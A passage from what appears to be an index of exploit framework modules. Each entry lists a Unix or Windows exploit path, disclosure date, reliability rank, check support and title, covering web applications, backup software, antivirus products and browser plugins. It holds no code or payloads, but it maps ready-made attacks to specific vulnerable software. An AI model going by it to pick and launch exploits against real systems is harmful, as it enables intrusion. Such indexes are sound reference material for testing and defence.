excellent No Sun Solaris Telnet Remote Authentication Bypass Vulnerability - solaris/telnet/ttyprompt 2002-01-18 excellent No Solaris in.telnetd TTYPROMPT Buffer Overflow - unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock) - unix/dhcp/rhel_dhcp_client_command_injection 2018-05-15 excellent No DHCP Client Command Injection (DynoRoot) - unix/fileformat/ghostscript_type_confusion 2017-04-27 excellent No Ghostscript Type Confusion Arbitrary Command Execution - unix/fileformat/imagemagick_delegate 2016-05-03 excellent No ImageMagick Delegate Arbitrary Command Execution - unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution - unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution - unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution - unix/http/contentkeeperweb_mimencode 2009-02-25 excellent Yes ContentKeeper Web Remote Command Execution - unix/http/ctek_skyrouter 2011-09-08 average No CTEK SkyRouter 4200 and 4300 Command Execution - unix/http/dell_kace_k1000_upload 2014-03-07 excellent Yes Dell KACE K1000 File Upload - unix/http/epmp1000_get_chart_cmd_shell 2017-12-18 excellent Yes Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7) - unix/http/epmp1000_ping_cmd_shell 2015-11-28 excellent Yes Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5) - unix/http/freepbx_callmenum 2012-03-20 manual No FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution - unix/http/lifesize_room 2011-07-13 excellent No LifeSize Room Command Injection - unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense - unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE - unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE - unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection - unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution - unix/http/twiki_debug_plugins 2014-10-09 excellent Yes TWiki Debugenableplugins Remote Code Execution - unix/http/vmturbo_vmtadmin_exec_noauth 2014-06-25 excellent Yes VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution - unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution - unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution - unix/local/at_persistence 1997-01-01 excellent Yes at(1) Persistence - unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation - unix/local/emacs_movemail 1986-08-01 excellent Yes Emacs movemail Privilege Escalation - unix/local/exim_perl_startup 2016-03-10 excellent Yes Exim "perl_startup" Privilege Escalation - unix/local/netbsd_mail_local 2016-07-07 excellent No NetBSD mail.local Privilege Escalation - unix/local/setuid_nmap 2012-07-19 excellent Yes Setuid Nmap Exploit - unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution - unix/misc/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass - unix/misc/polycom_hdx_traceroute_exec 2017-11-12 excellent Yes Polycom Shell HDX Series Traceroute Command Execution - unix/misc/qnx_qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution - unix/misc/spamassassin_exec 2006-06-06 excellent No SpamAssassin spamd Remote Command Execution - unix/misc/xerox_mfp 2012-03-07 good No Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability - unix/misc/zabbix_agent_exec 2009-09-10 excellent No Zabbix Agent net.tcp.listen Command Injection - unix/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass - unix/smtp/clamav_milter_blackhole 2007-08-24 excellent No ClamAV Milter Blackhole-Mode Remote Code Execution - unix/smtp/exim4_string_format 2010-12-07 excellent No Exim4 string_format Function Heap Buffer Overflow - unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escape - unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock) - unix/sonicwall/sonicwall_xmlrpc_rce 2016-07-22 excellent Yes SonicWall Global Management System XMLRPC set_time_zone Unauth RCE - unix/ssh/array_vxag_vapv_privkey_privesc 2014-02-03 excellent No Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution - unix/ssh/tectia_passwd_changereq 2012-12-01 excellent Yes Tectia SSH USERAUTH Change Request Password Reset Vulnerability - unix/webapp/actualanalyzer_ant_cookie_exec 2014-08-28 excellent Yes ActualAnalyzer 'ant' Cookie Command Execution - unix/webapp/arkeia_upload_exec 2013-09-16 excellent Yes Western Digital Arkeia Remote Code Execution - unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution - unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution - unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution - unix/webapp/barracuda_img_exec 2005-09-01 excellent Yes Barracuda IMG.PL Remote Command Execution - unix/webapp/base_qry_common 2008-06-14 excellent No BASE base_qry_common Remote File Include - unix/webapp/basilic_diff_exec 2012-06-28 excellent Yes Basilic 1.5.14 diff.php Arbitrary Command Execution - unix/webapp/cacti_graphimage_exec 2005-01-15 excellent No Cacti graph_view.php Remote Command Execution - unix/webapp/cakephp_cache_corruption 2010-11-15 excellent No CakePHP Cache Corruption Code Execution - unix/webapp/carberp_backdoor_exec 2013-06-28 great Yes Carberp Web Panel C2 Backdoor Remote PHP Code Execution - unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution - unix/webapp/clipbucket_upload_exec 2013-10-04 excellent Yes ClipBucket Remote Code Execution - unix/webapp/coppermine_piceditor 2008-01-30 excellent Yes Coppermine Photo Gallery picEditor.php Command Execution - unix/webapp/datalife_preview_exec 2013-01-28 excellent Yes DataLife Engine preview.php PHP Code Injection - unix/webapp/dogfood_spell_exec 2009-03-03 excellent Yes Dogfood CRM spell.php Remote Command Execution - unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution - unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection - unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution - unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE - unix/webapp/egallery_upload_exec 2012-07-08 excellent Yes EGallery PHP File Upload Vulnerability - unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection - unix/webapp/flashchat_upload_exec 2013-10-04 excellent Yes FlashChat Arbitrary File Upload - unix/webapp/foswiki_maketext 2012-12-03 excellent Yes Foswiki MAKETEXT Remote Command Execution - unix/webapp/freepbx_config_exec 2014-03-21 excellent Yes FreePBX config.php Remote Code Execution - unix/webapp/generic_exec 1993-11-14 excellent No Generic Web Application Unix Command Execution - unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability - unix/webapp/google_proxystylesheet_exec 2005-08-16 excellent Yes Google Appliance ProxyStyleSheet Command Execution - unix/webapp/graphite_pickle_exec 2013-08-20 excellent Yes Graphite Web Unsafe Pickle Handling - unix/webapp/guestbook_ssi_exec 1999-11-05 excellent No Matt Wright guestbook.pl Arbitrary Command Execution - unix/webapp/hastymail_exec 2011-11-22 excellent Yes Hastymail 2.1.1 RC1 Command Injection - unix/webapp/havalite_upload_exec 2013-06-17 excellent Yes Havalite CMS Arbitary File Upload Vulnerability - unix/webapp/horde_unserialize_exec 2013-06-27 excellent Yes Horde Framework Unserialize PHP Code Execution - unix/webapp/hybridauth_install_php_exec 2014-08-04 manual Yes HybridAuth install.php PHP Code Execution - unix/webapp/instantcms_exec 2013-06-26 excellent Yes InstantCMS 1.6 Remote PHP Code Execution - unix/webapp/invision_pboard_unserialize_exec 2012-10-25 excellent Yes Invision IP.Board unserialize() PHP Code Execution - unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution - unix/webapp/joomla_comfields_sqli_rce 2017-05-17 excellent Yes Joomla Component Fields SQLi Remote Code Execution - unix/webapp/joomla_comjce_imgmanager 2012-08-02 excellent Yes Joomla Component JCE File Upload Remote Code Execution - unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution - unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability - unix/webapp/joomla_tinybrowser 2009-07-22 excellent Yes Joomla 1.5.12 TinyBrowser File Upload Code Execution - unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload - unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection - unix/webapp/libretto_upload_exec 2013-06-14 excellent Yes LibrettoCMS File Manager Arbitary File Upload Vulnerability - unix/webapp/maarch_letterbox_file_upload 2015-02-11 excellent Yes Maarch LetterBox Unrestricted File Upload - unix/webapp/mambo_cache_lite 2008-06-14 excellent No Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include - unix/webapp/mitel_awc_exec 2010-12-12 excellent No Mitel Audio and Web Conferencing Command Injection - unix/webapp/moinmoin_twikidraw 2012-12-30 manual Yes MoinMoin twikidraw Action Traversal File Upload - unix/webapp/mybb_backdoor 2011-10-06 excellent Yes myBB 1.6.4 Backdoor Arbitrary Command Execution - unix/webapp/nagios3_history_cgi 2012-12-09 great Yes Nagios3 history.cgi Host Command Execution - unix/webapp/nagios3_statuswml_ping 2009-06-22 excellent No Nagios3 statuswml.cgi Ping Command Execution - unix/webapp/nagios_graph_explorer 2012-11-30 excellent Yes Nagios XI Network Monitor Graph Explorer Component Command Injection - unix/webapp/narcissus_backend_exec 2012-11-14 excellent Yes Narcissus Image Configuration Passthru Vulnerability - unix/webapp/open_flash_chart_upload_exec 2009-12-14 great Yes Open Flash Chart v2 Arbitrary File Upload - unix/webapp/openemr_sqli_privesc_upload 2013-09-16 excellent Yes OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution - unix/webapp/openemr_upload_exec 2013-02-13 excellent Yes OpenEMR PHP File Upload Vulnerability - unix/webapp/opensis_modname_exec 2012-12-04 excellent Yes OpenSIS 'modname' PHP Code Execution - unix/webapp/openview_connectednodes_exec 2005-08-25 excellent No HP Openview connectedNodes.ovpl Remote Command Execution - unix/webapp/openx_banner_edit 2009-11-24 excellent Yes OpenX banner-edit.php File Upload PHP Code Execution - unix/webapp/oracle_vm_agent_utl 2010-10-12 excellent Yes Oracle VM Server Virtual Server Agent Command Injection - unix/webapp/oscommerce_filemanager 2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution - unix/webapp/pajax_remote_exec 2006-03-30 excellent No PAJAX Remote Command Execution - unix/webapp/php_charts_exec 2013-01-16 excellent Yes PHP-Charts v1.0 PHP Code Execution Vulnerability - unix/webapp/php_eval 2008-10-13 manual Yes Generic PHP Code Evaluation - unix/webapp/php_include 2006-12-17 normal Yes PHP Remote File Include Generic Code Execution - unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution - unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution - unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution - unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload - unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection - unix/webapp/piwik_superuser_plugin_upload 2017-02-05 excellent No Piwik Superuser Plugin Upload - unix/webapp/projectpier_upload_exec 2012-10-08 excellent Yes Project Pier Arbitrary File Upload Vulnerability - unix/webapp/projectsend_upload_exec 2014-12-02 excellent Yes ProjectSend Arbitrary File Upload - unix/webapp/qtss_parse_xml_exec 2003-02-24 excellent No QuickTime Streaming Server parse_xml.cgi Remote Execution - unix/webapp/redmine_scm_exec 2010-12-19 excellent No Redmine SCM Repository Arbitrary Command Execution - unix/webapp/seportal_sqli_exec 2014-03-20 excellent Yes SePortal SQLi Remote Code Execution - unix/webapp/simple_e_document_upload_exec 2014-01-23 excellent Yes Simple E-Document Arbitrary File Upload - unix/webapp/sixapart_movabletype_storable_exec 2015-02-11 good Yes SixApart MovableType Storable Perl Code Execution - unix/webapp/skybluecanvas_exec 2014-01-28 excellent Yes SkyBlueCanvas CMS Remote Code Execution - unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution - unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection - unix/webapp/squash_yaml_exec 2013-08-06 excellent Yes Squash YAML Code Execution - unix/webapp/squirrelmail_pgp_plugin 2007-07-09 manual No SquirrelMail PGP Plugin Command Execution (SMTP) - unix/webapp/sugarcrm_rest_unserialize_exec 2016-06-23 excellent No SugarCRM REST Unserialize PHP Code Execution - unix/webapp/sugarcrm_unserialize_exec 2012-06-23 excellent No SugarCRM unserialize() PHP Code Execution - unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent Yes TikiWiki tiki-graph_formula Remote PHP Code Execution - unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent Yes TikiWiki jhot Remote Command Execution - unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent No Tiki Wiki unserialize() PHP Code Execution - unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability - unix/webapp/trixbox_langchoice 2008-07-09 manual Yes Trixbox langChoice PHP Local File Inclusion - unix/webapp/tuleap_rest_unserialize_exec 2017-10-23 excellent Yes Tuleap 9.6 Second-Order PHP Object Injection - unix/webapp/tuleap_unserialize_exec 2014-11-27 excellent Yes Tuleap PHP Unserialize Code Execution - unix/webapp/twiki_history 2005-09-14 excellent Yes TWiki History TWikiUsers rev Parameter Command Execution - unix/webapp/twiki_maketext 2012-12-15 excellent Yes TWiki MAKETEXT Remote Command Execution - unix/webapp/twiki_search 2004-10-01 excellent Yes TWiki Search Function Arbitrary Command Execution - unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection - unix/webapp/vicidial_manager_send_cmd_exec 2013-10-23 excellent Yes VICIdial Manager Send OS Command Injection - unix/webapp/vicidial_user_authorization_unauth_cmd_exec 2017-05-26 excellent Yes VICIdial user_authorization Unauthenticated Command Execution - unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution - unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE - unix/webapp/webtester_exec 2013-10-17 excellent Yes WebTester 5.x Command Execution - unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload - unix/webapp/wp_advanced_custom_fields_exec 2012-11-14 excellent Yes WordPress Plugin Advanced Custom Fields Remote File Inclusion - unix/webapp/wp_ajax_load_more_file_upload 2015-10-10 excellent Yes Wordpress Ajax Load More PHP Upload Vulnerability - unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability - unix/webapp/wp_creativecontactform_file_upload 2014-10-22 excellent Yes Wordpress Creative Contact Form Upload Vulnerability - unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent Yes Wordpress Download Manager (download-manager) Unauthenticated File Upload - unix/webapp/wp_easycart_unrestricted_file_upload 2015-01-08 excellent No WordPress WP EasyCart Unrestricted File Upload - unix/webapp/wp_foxypress_upload 2012-06-05 excellent Yes WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution - unix/webapp/wp_frontend_editor_file_upload 2012-07-04 excellent Yes Wordpress Front-end Editor File Upload - unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal Yes WordPress Plugin Google Document Embedder Arbitrary File Disclosure - unix/webapp/wp_holding_pattern_file_upload 2015-02-11 excellent Yes WordPress Holding Pattern Theme Arbitrary File Upload - unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes Wordpress InBoundio Marketing PHP Upload Vulnerability - unix/webapp/wp_infusionsoft_upload 2014-09-25 excellent Yes Wordpress InfusionSoft Upload Vulnerability - unix/webapp/wp_lastpost_exec 2005-08-09 excellent No WordPress cache_lastpostdate Arbitrary Code Execution - unix/webapp/wp_mobile_detector_upload_execute 2016-05-31 excellent Yes WordPress WP Mobile Detector 3.5 Shell Upload - unix/webapp/wp_nmediawebsite_file_upload 2015-04-12 excellent Yes Wordpress N-Media Website Contact Form Upload Vulnerability - unix/webapp/wp_optimizepress_upload 2013-11-29 excellent Yes WordPress OptimizePress Theme File Upload Vulnerability - unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload - unix/webapp/wp_phpmailer_host_header 2017-05-03 average Yes WordPress PHPMailer Host Header Command Injection - unix/webapp/wp_pixabay_images_upload 2015-01-19 excellent Yes WordPress Pixabay Images PHP Code Upload - unix/webapp/wp_platform_exec 2015-01-21 excellent No WordPress Platform Theme File Upload Vulnerability - unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability - unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability - unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerability - unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload - unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload - unix/webapp/wp_total_cache_exec 2013-04-17 excellent Yes WordPress W3 Total Cache PHP Code Execution - unix/webapp/wp_worktheflow_upload 2015-03-14 excellent Yes Wordpress Work The Flow Upload Vulnerability - unix/webapp/wp_wpshop_ecommerce_file_upload 2015-03-09 excellent Yes WordPress WPshop eCommerce Arbitrary File Upload Vulnerability - unix/webapp/wp_wptouch_file_upload 2014-07-14 excellent Yes WordPress WPTouch Authenticated File Upload - unix/webapp/wp_wysija_newsletters_upload 2014-07-01 excellent Yes Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload - unix/webapp/xoda_file_upload 2012-08-21 excellent Yes XODA 0.4.5 Arbitrary PHP File Upload Vulnerability - unix/webapp/zeroshell_exec 2013-09-22 excellent Yes ZeroShell Remote Code Execution - unix/webapp/zimbra_lfi 2013-12-06 excellent Yes Zimbra Collaboration Server LFI - unix/webapp/zoneminder_packagecontrol_exec 2013-01-22 excellent Yes ZoneMinder Video Server packageControl Command Execution - unix/webapp/zpanel_username_exec 2013-06-07 excellent Yes ZPanel 10.0.0.2 htpasswd Module Username Command Execution - unix/x11/x11_keyboard_exec 2015-07-10 excellent No X11 Keyboard Command Injection - windows/antivirus/ams_hndlrsvc 2010-07-26 excellent No Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution - windows/antivirus/ams_xfr 2009-04-28 excellent No Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution - windows/antivirus/symantec_endpoint_manager_rce 2014-02-24 excellent Yes Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution - windows/antivirus/symantec_iao 2009-04-28 good No Symantec Alert Management System Intel Alert Originator Service Buffer Overflow - windows/antivirus/symantec_rtvscan 2006-05-24 good No Symantec Remote Management Buffer Overflow - windows/antivirus/symantec_workspace_streaming_exec 2014-05-12 excellent Yes Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload - windows/antivirus/trendmicro_serverprotect 2007-02-20 good No Trend Micro ServerProtect 5.58 Buffer Overflow - windows/antivirus/trendmicro_serverprotect_createbinding 2007-05-07 good No Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow - windows/antivirus/trendmicro_serverprotect_earthagent 2007-05-07 good No Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow - windows/arkeia/type77 2005-02-18 good Yes Arkeia Backup Client Type 77 Overflow (Win32) - windows/backdoor/energizer_duo_payload 2010-03-05 excellent No Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution - windows/backupexec/name_service 2004-12-16 average No Veritas Backup Exec Name Service Overflow - windows/backupexec/remote_agent 2005-06-22 great Yes Veritas Backup Exec Windows Remote Agent Overflow - windows/backupexec/ssl_uaf 2017-05-10 normal Yes Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free - windows/brightstor/ca_arcserve_342 2008-10-09 average No Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow - windows/brightstor/discovery_tcp 2005-02-14 average Yes CA BrightStor Discovery Service TCP Overflow - windows/brightstor/discovery_udp 2004-12-20 average Yes CA BrightStor Discovery Service Stack Buffer Overflow - windows/brightstor/etrust_itm_alert 2008-04-04 average No Computer Associates Alert Notification Buffer Overflow - windows/brightstor/hsmserver 2007-09-27 great No CA BrightStor HSM Buffer Overflow - windows/brightstor/lgserver 2007-01-31 average No CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/lgserver_multi 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow - windows/brightstor/lgserver_rxrlogin 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow - windows/brightstor/lgserver_rxsuselicenseini 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/license_gcr 2005-03-02 average No CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow - windows/brightstor/mediasrv_sunrpc 2007-04-25 average No CA BrightStor ArcServe Media Service Stack Buffer Overflow - windows/brightstor/message_engine 2007-01-11 average No CA BrightStor ARCserve Message Engine Buffer Overflow - windows/brightstor/message_engine_72 2010-10-04 average No CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow - windows/brightstor/message_engine_heap 2006-10-05 average No CA BrightStor ARCserve Message Engine Heap Overflow - windows/brightstor/sql_agent 2005-08-02 average No CA BrightStor Agent for Microsoft SQL Overflow - windows/brightstor/tape_engine 2006-11-21 average No CA BrightStor ARCserve Tape Engine Buffer Overflow - windows/brightstor/tape_engine_0x8a 2010-10-04 average No CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow - windows/brightstor/universal_agent 2005-04-11 average No CA BrightStor Universal Agent Overflow - windows/browser/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow - windows/browser/adobe_flash_avm2 2014-02-05 normal No Adobe Flash Player Integer Underflow Remote Code Execution - windows/browser/adobe_flash_casi32_int_overflow 2014-10-14 great No Adobe Flash Player casi32 Integer Overflow - windows/browser/adobe_flash_copy_pixels_to_byte_array 2014-09-23 great No Adobe Flash Player copyPixelsToByteArray Method Integer Overflow - windows/browser/adobe_flash_domain_memory_uaf 2014-04-14 great No Adobe Flash Player domainMemory ByteArray Use After Free - windows/browser/adobe_flash_filters_type_confusion 2013-12-10 normal No Adobe Flash Player Type Confusion Remote Code Execution - windows/browser/adobe_flash_mp4_cprt 2012-02-15 normal No Adobe Flash Player MP4 'cprt' Overflow - windows/browser/adobe_flash_otf_font 2012-08-09 normal No Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow - windows/browser/adobe_flash_pcre 2014-11-25 normal No Adobe Flash Player PCRE Regex Vulnerability - windows/browser/adobe_flash_regex_value 2013-02-08 normal No Adobe Flash Player Regular Expression Heap Overflow - windows/browser/adobe_flash_rtmp 2012-05-04 normal No Adobe Flash Player Object Type Confusion - windows/browser/adobe_flash_sps 2011-08-09 normal No Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow - windows/browser/adobe_flash_uncompress_zlib_uninitialized 2014-11-11 good No Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory - windows/browser/adobe_flash_worker_byte_array_uaf 2015-02-02 great No Adobe Flash Player ByteArray With Workers Use After Free - windows/browser/adobe_flashplayer_arrayindexing 2012-06-21 great No Adobe Flash Player AVM Verification Logic Array Indexing Code Execution - windows/browser/adobe_flashplayer_avm 2011-03-15 good No Adobe Flash Player AVM Bytecode Verification Vulnerability - windows/browser/adobe_flashplayer_flash10o 2011-04-11 normal No Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability - windows/browser/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use - windows/browser/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow - windows/browser/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow - windows/browser/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Heap Corruption - windows/browser/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability - windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal No Adobe Shockwave rcsL Memory Corruption - windows/browser/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free - windows/browser/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow - windows/browser/advantech_webaccess_dvs_getcolor 2014-07-17 normal No Advantech WebAccess dvs.ocx GetColor Buffer Overflow - windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow - windows/browser/aladdin_choosefilepath_bof 2012-04-01 normal No Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow - windows/browser/amaya_bdo 2009-01-28 normal No Amaya Browser v11.0 'bdo' Tag Overflow - windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow - windows/browser/aol_icq_downloadagent 2006-11-06 excellent No America Online ICQ ActiveX Control Arbitrary File Download and Execute - windows/browser/apple_itunes_playlist 2005-01-11 normal No Apple ITunes 4.7 Playlist Buffer Overflow - windows/browser/apple_quicktime_marshaled_punk 2010-08-30 great No Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution - windows/browser/apple_quicktime_mime_type 2012-11-07 normal No Apple QuickTime 7.7.2 MIME Type Buffer Overflow - windows/browser/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow - windows/browser/apple_quicktime_rtsp 2007-01-01 normal No Apple QuickTime 7.1.3 RTSP URI Buffer Overflow - windows/browser/apple_quicktime_smil_debug 2010-08-12 good No Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow - windows/browser/apple_quicktime_texml_font_table 2012-11-07 normal No Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow - windows/browser/ask_shortformat 2007-09-24 normal No Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow - windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow - windows/browser/athocgov_completeinstallation 2008-02-15 normal No AtHocGov IWSAlerts ActiveX Control Buffer Overflow - windows/browser/autodesk_idrop 2009-04-02 normal No Autodesk IDrop ActiveX Control Heap Memory Corruption - windows/browser/aventail_epi_activex 2010-08-19 normal No SonicWALL Aventail epi.dll AuthCredential Format String - windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow - windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent No AwingSoft Winds3D Player 3.5 SceneURL Download and Execute - windows/browser/baofeng_storm_onbeforevideodownload 2009-04-30 normal No BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow - windows/browser/barcode_ax49 2007-06-22 normal No RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow - windows/browser/blackice_downloadimagefileurl 2008-06-05 excellent No Black Ice Cover Page ActiveX Control Arbitrary File Download - windows/browser/c6_messenger_downloaderactivex 2008-06-03 excellent No Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute - windows/browser/ca_brightstor_addcolumn 2008-03-16 normal No CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow - windows/browser/chilkat_crypt_writefile 2008-11-03 excellent No Chilkat Crypt ActiveX WriteFile Unsafe Method - windows/browser/cisco_anyconnect_exec 2011-06-01 excellent No Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute - windows/browser/cisco_playerpt_setsource 2012-03-22 normal No Cisco Linksys PlayerPT ActiveX Control Buffer Overflow - windows/browser/cisco_playerpt_setsource_surl 2012-07-17 normal No Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow - windows/browser/cisco_webex_ext 2017-01-21 great No Cisco WebEx Chrome Extension RCE (CVE-2017-3823) - windows/browser/citrix_gateway_actx 2011-07-14 normal No Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability - windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution - 